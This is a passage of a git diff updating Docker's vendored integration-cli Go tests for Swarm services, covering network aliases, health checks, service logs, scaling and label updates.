@@ -173,3 +410,38 @@ func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.HasPrefix, "tmpfs on /foo type tmpfs")
 	c.Assert(strings.TrimSpace(out), checker.Contains, "size=1024k")
 }
+
+func (s *DockerSwarmSuite) TestServiceCreateWithNetworkAlias(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	out, err := d.Cmd("network", "create", "--scope=swarm", "test_swarm_br")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--network=name=test_swarm_br,alias=srv_alias", "--name=alias_tst_container", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.GetServiceTasks(c, id)
+		return len(tasks) > 0, nil
+	}, checker.Equals, true)
+
+	task := tasks[0]
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		if task.NodeID == "" || task.Status.ContainerStatus == nil {
+			task = d.GetTask(c, task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil, nil
+	}, checker.Equals, true)
+
+	// check container alias config
+	out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .NetworkSettings.Networks.test_swarm_br.Aliases}}", task.Status.ContainerStatus.ContainerID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Make sure the only alias seen is the container-id
+	var aliases []string
+	c.Assert(json.Unmarshal([]byte(out), &aliases), checker.IsNil)
+	c.Assert(aliases, checker.HasLen, 1)
+
+	c.Assert(task.Status.ContainerStatus.ContainerID, checker.Contains, aliases[0])
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go
index 30580f6be3..ae9e7868bb 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go
@@ -8,8 +8,11 @@ import (
 
 	"github.com/docker/docker/api/types/swarm"
 	"github.com/docker/docker/daemon/cluster/executor/container"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 // start a service, and then make its task unhealthy during running
@@ -20,24 +23,23 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	// build image with health-check
-	// note: use `daemon.buildImageWithOut` to build, do not use `buildImage` to build
 	imageName := "testhealth"
-	_, _, err := d.buildImageWithOut(imageName,
-		`FROM busybox
+	result := cli.BuildCmd(c, imageName, cli.Daemon(d),
+		build.WithDockerfile(`FROM busybox
 		RUN touch /status
 		HEALTHCHECK --interval=1s --timeout=1s --retries=1\
-		  CMD cat /status`,
-		true)
-	c.Check(err, check.IsNil)
+		  CMD cat /status`),
+	)
+	result.Assert(c, icmd.Success)
 
 	serviceName := "healthServiceRun"
-	out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top")
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--name", serviceName, imageName, "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	id := strings.TrimSpace(out)
 
 	var tasks []swarm.Task
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks = d.getServiceTasks(c, id)
+		tasks = d.GetServiceTasks(c, id)
 		return tasks, nil
 	}, checker.HasLen, 1)
 
@@ -45,7 +47,7 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) {
 
 	// wait for task to start
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		task = d.getTask(c, task.ID)
+		task = d.GetTask(c, task.ID)
 		return task.Status.State, nil
 	}, checker.Equals, swarm.TaskStateRunning)
 	containerID := task.Status.ContainerStatus.ContainerID
@@ -66,7 +68,7 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) {
 
 	// Task should be terminated
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		task = d.getTask(c, task.ID)
+		task = d.GetTask(c, task.ID)
 		return task.Status.State, nil
 	}, checker.Equals, swarm.TaskStateFailed)
 
@@ -84,21 +86,21 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) {
 
 	// service started from this image won't pass health check
 	imageName := "testhealth"
-	_, _, err := d.buildImageWithOut(imageName,
-		`FROM busybox
+	result := cli.BuildCmd(c, imageName, cli.Daemon(d),
+		build.WithDockerfile(`FROM busybox
 		HEALTHCHECK --interval=1s --timeout=1s --retries=1024\
-		  CMD cat /status`,
-		true)
-	c.Check(err, check.IsNil)
+		  CMD cat /status`),
+	)
+	result.Assert(c, icmd.Success)
 
 	serviceName := "healthServiceStart"
-	out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top")
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--name", serviceName, imageName, "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	id := strings.TrimSpace(out)
 
 	var tasks []swarm.Task
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks = d.getServiceTasks(c, id)
+		tasks = d.GetServiceTasks(c, id)
 		return tasks, nil
 	}, checker.HasLen, 1)
 
@@ -106,7 +108,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) {
 
 	// wait for task to start
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		task = d.getTask(c, task.ID)
+		task = d.GetTask(c, task.ID)
 		return task.Status.State, nil
 	}, checker.Equals, swarm.TaskStateStarting)
 
@@ -120,7 +122,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) {
 	}, checker.GreaterThan, 0)
 
 	// task should be blocked at starting status
-	task = d.getTask(c, task.ID)
+	task = d.GetTask(c, task.ID)
 	c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting)
 
 	// make it healthy
@@ -128,64 +130,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) {
 
 	// Task should be at running status
 	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		task = d.getTask(c, task.ID)
-		return task.Status.State, nil
-	}, checker.Equals, swarm.TaskStateRunning)
-}
-
-// start a service whose task is unhealthy at beginning
-// its tasks should be blocked in starting stage, until health check is passed
-func (s *DockerSwarmSuite) TestServiceHealthUpdate(c *check.C) {
-	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
-
-	d := s.AddDaemon(c, true, true)
-
-	// service started from this image won't pass health check
-	imageName := "testhealth"
-	_, _, err := d.buildImageWithOut(imageName,
-		`FROM busybox
-		HEALTHCHECK --interval=1s --timeout=1s --retries=1024\
-		  CMD cat /status`,
-		true)
-	c.Check(err, check.IsNil)
-
-	serviceName := "healthServiceStart"
-	out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	id := strings.TrimSpace(out)
-
-	var tasks []swarm.Task
-	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks = d.getServiceTasks(c, id)
-		return tasks, nil
-	}, checker.HasLen, 1)
-
-	task := tasks[0]
-
-	// wait for task to start
-	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		task = d.getTask(c, task.ID)
-		return task.Status.State, nil
-	}, checker.Equals, swarm.TaskStateStarting)
-
-	containerID := task.Status.ContainerStatus.ContainerID
-
-	// wait for health check to work
-	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID)
-		failingStreak, _ := strconv.Atoi(strings.TrimSpace(out))
-		return failingStreak, nil
-	}, checker.GreaterThan, 0)
-
-	// task should be blocked at starting status
-	task = d.getTask(c, task.ID)
-	c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting)
-
-	// make it healthy
-	d.Cmd("exec", containerID, "touch", "/status")
-	// Task should be at running status
-	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
-		task = d.getTask(c, task.ID)
+		task = d.GetTask(c, task.ID)
 		return task.Status.State, nil
 	}, checker.Equals, swarm.TaskStateRunning)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go
deleted file mode 100644
index c2216543d7..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go
+++ /dev/null
@@ -1,96 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"bufio"
-	"fmt"
-	"io"
-	"os/exec"
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-type logMessage struct {
-	err  error
-	data []byte
-}
-
-func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) {
-	testRequires(c, ExperimentalDaemon)
-
-	d := s.AddDaemon(c, true, true)
-
-	// we have multiple services here for detecting the goroutine issue #28915
-	services := map[string]string{
-		"TestServiceLogs1": "hello1",
-		"TestServiceLogs2": "hello2",
-	}
-
-	for name, message := range services {
-		out, err := d.Cmd("service", "create", "--name", name, "busybox",
-			"sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message))
-		c.Assert(err, checker.IsNil)
-		c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
-	}
-
-	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout,
-		d.checkActiveContainerCount, checker.Equals, len(services))
-
-	for name, message := range services {
-		out, err := d.Cmd("service", "logs", name)
-		c.Assert(err, checker.IsNil)
-		c.Logf("log for %q: %q", name, out)
-		c.Assert(out, checker.Contains, message)
-	}
-}
-
-func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) {
-	testRequires(c, ExperimentalDaemon)
-
-	d := s.AddDaemon(c, true, true)
-
-	name := "TestServiceLogsFollow"
-
-	out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done")
-	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
-
-	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
-
-	args := []string{"service", "logs", "-f", name}
-	cmd := exec.Command(dockerBinary, d.prependHostArg(args)...)
-	r, w := io.Pipe()
-	cmd.Stdout = w
-	cmd.Stderr = w
-	c.Assert(cmd.Start(), checker.IsNil)
-
-	// Make sure pipe is written to
-	ch := make(chan *logMessage)
-	done := make(chan struct{})
-	go func() {
-		reader := bufio.NewReader(r)
-		for {
-			msg := &logMessage{}
-			msg.data, _, msg.err = reader.ReadLine()
-			select {
-			case ch <- msg:
-			case <-done:
-				return
-			}
-		}
-	}()
-
-	for i := 0; i < 3; i++ {
-		msg := <-ch
-		c.Assert(msg.err, checker.IsNil)
-		c.Assert(string(msg.data), checker.Contains, "log test")
-	}
-	close(done)
-
-	c.Assert(cmd.Process.Kill(), checker.IsNil)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go
new file mode 100644
index 0000000000..ba337491b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go
@@ -0,0 +1,388 @@
+// +build !windows
+
+package main
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/go-check/check"
+	"gotest.tools/icmd"
+)
+
+type logMessage struct {
+	err  error
+	data []byte
+}
+
+func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// we have multiple services here for detecting the goroutine issue #28915
+	services := map[string]string{
+		"TestServiceLogs1": "hello1",
+		"TestServiceLogs2": "hello2",
+	}
+
+	for name, message := range services {
+		out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox",
+			"sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message))
+		c.Assert(err, checker.IsNil)
+		c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	}
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout,
+		d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{"busybox:latest": len(services)})
+
+	for name, message := range services {
+		out, err := d.Cmd("service", "logs", name)
+		c.Assert(err, checker.IsNil)
+		c.Logf("log for %q: %q", name, out)
+		c.Assert(out, checker.Contains, message)
+	}
+}
+
+// countLogLines returns a closure that can be used with waitAndAssert to
+// verify that a minimum number of expected container log messages have been
+// output.
+func countLogLines(d *daemon.Daemon, name string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		result := icmd.RunCmd(d.Command("service", "logs", "-t", "--raw", name))
+		result.Assert(c, icmd.Expected{})
+		// if this returns an emptystring, trying to split it later will return
+		// an array containing emptystring. a valid log line will NEVER be
+		// emptystring because we ask for the timestamp.
+		if result.Stdout() == "" {
+			return 0, check.Commentf("Empty stdout")
+		}
+		lines := strings.Split(strings.TrimSpace(result.Stdout()), "\n")
+		return len(lines), check.Commentf("output, %q", string(result.Stdout()))
+	}
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsCompleteness(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsCompleteness"
+
+	// make a service that prints 6 lines
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for line in $(seq 0 5); do echo log test $line; done; sleep 100000")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+	// and make sure we have all the log lines
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6)
+
+	out, err = d.Cmd("service", "logs", name)
+	c.Assert(err, checker.IsNil)
+	lines := strings.Split(strings.TrimSpace(out), "\n")
+
+	// i have heard anecdotal reports that logs may come back from the engine
+	// mis-ordered. if this tests fails, consider the possibility that that
+	// might be occurring
+	for i, line := range lines {
+		c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i))
+	}
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsTail(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsTail"
+
+	// make a service that prints 6 lines
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for line in $(seq 1 6); do echo log test $line; done; sleep 100000")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6)
+
+	out, err = d.Cmd("service", "logs", "--tail=2", name)
+	c.Assert(err, checker.IsNil)
+	lines := strings.Split(strings.TrimSpace(out), "\n")
+
+	for i, line := range lines {
+		// doing i+5 is hacky but not too fragile, it's good enough. if it flakes something else is wrong
+		c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i+5))
+	}
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsSince(c *check.C) {
+	// See DockerSuite.TestLogsSince, which is where this comes from
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsSince"
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for i in $(seq 1 3); do sleep .1; echo log$i; done; sleep 10000000")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+	// wait a sec for the logs to come in
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 3)
+
+	out, err = d.Cmd("service", "logs", "-t", name)
+	c.Assert(err, checker.IsNil)
+
+	log2Line := strings.Split(strings.Split(out, "\n")[1], " ")
+	t, err := time.Parse(time.RFC3339Nano, log2Line[0]) // timestamp log2 is written
+	c.Assert(err, checker.IsNil)
+	u := t.Add(50 * time.Millisecond) // add .05s so log1 & log2 don't show up
+	since := u.Format(time.RFC3339Nano)
+
+	out, err = d.Cmd("service", "logs", "-t", fmt.Sprintf("--since=%v", since), name)
+	c.Assert(err, checker.IsNil)
+
+	unexpected := []string{"log1", "log2"}
+	expected := []string{"log3"}
+	for _, v := range unexpected {
+		c.Assert(out, checker.Not(checker.Contains), v, check.Commentf("unexpected log message returned, since=%v", u))
+	}
+	for _, v := range expected {
+		c.Assert(out, checker.Contains, v, check.Commentf("expected log message %v, was not present, since=%v", u))
+	}
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsFollow"
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+
+	args := []string{"service", "logs", "-f", name}
+	cmd := exec.Command(dockerBinary, d.PrependHostArg(args)...)
+	r, w := io.Pipe()
+	cmd.Stdout = w
+	cmd.Stderr = w
+	c.Assert(cmd.Start(), checker.IsNil)
+	go cmd.Wait()
+
+	// Make sure pipe is written to
+	ch := make(chan *logMessage)
+	done := make(chan struct{})
+	go func() {
+		reader := bufio.NewReader(r)
+		for {
+			msg := &logMessage{}
+			msg.data, _, msg.err = reader.ReadLine()
+			select {
+			case ch <- msg:
+			case <-done:
+				return
+			}
+		}
+	}()
+
+	for i := 0; i < 3; i++ {
+		msg := <-ch
+		c.Assert(msg.err, checker.IsNil)
+		c.Assert(string(msg.data), checker.Contains, "log test")
+	}
+	close(done)
+
+	c.Assert(cmd.Process.Kill(), checker.IsNil)
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsTaskLogs(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServicelogsTaskLogs"
+	replicas := 2
+
+	result := icmd.RunCmd(d.Command(
+		// create a service with the name
+		"service", "create", "--detach", "--no-resolve-image", "--name", name,
+		// which has some number of replicas
+		fmt.Sprintf("--replicas=%v", replicas),
+		// which has this the task id as an environment variable templated in
+		"--env", "TASK={{.Task.ID}}",
+		// and runs this command to print exactly 6 logs lines
+		"busybox", "sh", "-c", "for line in $(seq 0 5); do echo $TASK log test $line; done; sleep 100000",
+	))
+	result.Assert(c, icmd.Expected{})
+	// ^^ verify that we get no error
+	// then verify that we have an id in stdout
+	id := strings.TrimSpace(result.Stdout())
+	c.Assert(id, checker.Not(checker.Equals), "")
+	// so, right here, we're basically inspecting by id and returning only
+	// the ID. if they don't match, the service doesn't exist.
+	result = icmd.RunCmd(d.Command("service", "inspect", "--format=\"{{.ID}}\"", id))
+	result.Assert(c, icmd.Expected{Out: id})
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, replicas)
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6*replicas)
+
+	// get the task ids
+	result = icmd.RunCmd(d.Command("service", "ps", "-q", name))
+	result.Assert(c, icmd.Expected{})
+	// make sure we have two tasks
+	taskIDs := strings.Split(strings.TrimSpace(result.Stdout()), "\n")
+	c.Assert(taskIDs, checker.HasLen, replicas)
+
+	for _, taskID := range taskIDs {
+		c.Logf("checking task %v", taskID)
+		result := icmd.RunCmd(d.Command("service", "logs", taskID))
+		result.Assert(c, icmd.Expected{})
+		lines := strings.Split(strings.TrimSpace(result.Stdout()), "\n")
+
+		c.Logf("checking messages for %v", taskID)
+		for i, line := range lines {
+			// make sure the message is in order
+			c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i))
+			// make sure it contains the task id
+			c.Assert(line, checker.Contains, taskID)
+		}
+	}
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsTTY(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsTTY"
+
+	result := icmd.RunCmd(d.Command(
+		// create a service
+		"service", "create", "--detach", "--no-resolve-image",
+		// name it $name
+		"--name", name,
+		// use a TTY
+		"-t",
+		// busybox image, shell string
+		"busybox", "sh", "-c",
+		// echo to stdout and stderr
+		"echo out; (echo err 1>&2); sleep 10000",
+	))
+
+	result.Assert(c, icmd.Expected{})
+	id := strings.TrimSpace(result.Stdout())
+	c.Assert(id, checker.Not(checker.Equals), "")
+	// so, right here, we're basically inspecting by id and returning only
+	// the ID. if they don't match, the service doesn't exist.
+	result = icmd.RunCmd(d.Command("service", "inspect", "--format=\"{{.ID}}\"", id))
+	result.Assert(c, icmd.Expected{Out: id})
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+	// and make sure we have all the log lines
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 2)
+
+	cmd := d.Command("service", "logs", "--raw", name)
+	result = icmd.RunCmd(cmd)
+	// for some reason there is carriage return in the output. i think this is
+	// just expected.
+	result.Assert(c, icmd.Expected{Out: "out\r\nerr\r\n"})
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsNoHangDeletedContainer(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsNoHangDeletedContainer"
+
+	result := icmd.RunCmd(d.Command(
+		// create a service
+		"service", "create", "--detach", "--no-resolve-image",
+		// name it $name
+		"--name", name,
+		// busybox image, shell string
+		"busybox", "sh", "-c",
+		// echo to stdout and stderr
+		"while true; do echo line; sleep 2; done",
+	))
+
+	// confirm that the command succeeded
+	result.Assert(c, icmd.Expected{})
+	// get the service id
+	id := strings.TrimSpace(result.Stdout())
+	c.Assert(id, checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+	// and make sure we have all the log lines
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 2)
+
+	// now find and nuke the container
+	result = icmd.RunCmd(d.Command("ps", "-q"))
+	containerID := strings.TrimSpace(result.Stdout())
+	c.Assert(containerID, checker.Not(checker.Equals), "")
+	result = icmd.RunCmd(d.Command("stop", containerID))
+	result.Assert(c, icmd.Expected{Out: containerID})
+	result = icmd.RunCmd(d.Command("rm", containerID))
+	result.Assert(c, icmd.Expected{Out: containerID})
+
+	// run logs. use tail 2 to make sure we don't try to get a bunch of logs
+	// somehow and slow down execution time
+	cmd := d.Command("service", "logs", "--tail", "2", id)
+	// start the command and then wait for it to finish with a 3 second timeout
+	result = icmd.StartCmd(cmd)
+	result = icmd.WaitOnCmd(3*time.Second, result)
+
+	// then, assert that the result matches expected. if the command timed out,
+	// if the command is timed out, result.Timeout will be true, but the
+	// Expected defaults to false
+	result.Assert(c, icmd.Expected{})
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsDetails(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsDetails"
+
+	result := icmd.RunCmd(d.Command(
+		// create a service
+		"service", "create", "--detach", "--no-resolve-image",
+		// name it $name
+		"--name", name,
+		// add an environment variable
+		"--env", "asdf=test1",
+		// add a log driver (without explicitly setting a driver, log-opt doesn't work)
+		"--log-driver", "json-file",
+		// add a log option to print the environment variable
+		"--log-opt", "env=asdf",
+		// busybox image, shell string
+		"busybox", "sh", "-c",
+		// make a log line
+		"echo LogLine; while true; do sleep 1; done;",
+	))
+
+	result.Assert(c, icmd.Expected{})
+	id := strings.TrimSpace(result.Stdout())
+	c.Assert(id, checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+	// and make sure we have all the log lines
+	waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 1)
+
+	// First, test without pretty printing
+	// call service logs with details. set raw to skip pretty printing
+	result = icmd.RunCmd(d.Command("service", "logs", "--raw", "--details", name))
+	// in this case, we should get details and we should get log message, but
+	// there will also be context as details (which will fall after the detail
+	// we inserted in alphabetical order
+	result.Assert(c, icmd.Expected{Out: "asdf=test1"})
+	result.Assert(c, icmd.Expected{Out: "LogLine"})
+
+	// call service logs with details. this time, don't pass raw
+	result = icmd.RunCmd(d.Command("service", "logs", "--details", id))
+	// in this case, we should get details space logmessage as well. the context
+	// is part of the pretty part of the logline
+	result.Assert(c, icmd.Expected{Out: "asdf=test1 LogLine"})
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go
index 29cca2358d..41b49d64aa 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go
@@ -6,7 +6,7 @@ import (
 	"fmt"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
@@ -14,11 +14,11 @@ func (s *DockerSwarmSuite) TestServiceScale(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	service1Name := "TestService1"
-	service1Args := append([]string{"service", "create", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...)
+	service1Args := append([]string{"service", "create", "--detach", "--no-resolve-image", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...)
 
 	// global mode
 	service2Name := "TestService2"
-	service2Args := append([]string{"service", "create", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...)
+	service2Args := append([]string{"service", "create", "--detach", "--no-resolve-image", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...)
 
 	// Create services
 	out, err := d.Cmd(service1Args...)
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go
index 837370ceeb..a281327afe 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go
@@ -7,82 +7,47 @@ import (
 	"fmt"
 
 	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
-func (s *DockerSwarmSuite) TestServiceUpdatePort(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	serviceName := "TestServiceUpdatePort"
-	serviceArgs := append([]string{"service", "create", "--name", serviceName, "-p", "8080:8081", defaultSleepImage}, sleepCommandForDaemonPlatform()...)
-
-	// Create a service with a port mapping of 8080:8081.
-	out, err := d.Cmd(serviceArgs...)
-	c.Assert(err, checker.IsNil)
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
-
-	// Update the service: changed the port mapping from 8080:8081 to 8082:8083.
-	_, err = d.Cmd("service", "update", "--publish-add", "8082:8083", "--publish-rm", "8081", serviceName)
-	c.Assert(err, checker.IsNil)
-
-	// Inspect the service and verify port mapping
-	expected := []swarm.PortConfig{
-		{
-			Protocol:      "tcp",
-			PublishedPort: 8082,
-			TargetPort:    8083,
-			PublishMode:   "ingress",
-		},
-	}
-
-	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.EndpointSpec.Ports }}", serviceName)
-	c.Assert(err, checker.IsNil)
-
-	var portConfig []swarm.PortConfig
-	if err := json.Unmarshal([]byte(out), &portConfig); err != nil {
-		c.Fatalf("invalid JSON in inspect result: %v (%s)", err, out)
-	}
-	c.Assert(portConfig, checker.DeepEquals, expected)
-}
-
 func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) {
 	d := s.AddDaemon(c, true, true)
-	out, err := d.Cmd("service", "create", "--name=test", "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name=test", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	service := d.getService(c, "test")
+	service := d.GetService(c, "test")
 	c.Assert(service.Spec.Labels, checker.HasLen, 0)
 
 	// add label to empty set
-	out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar")
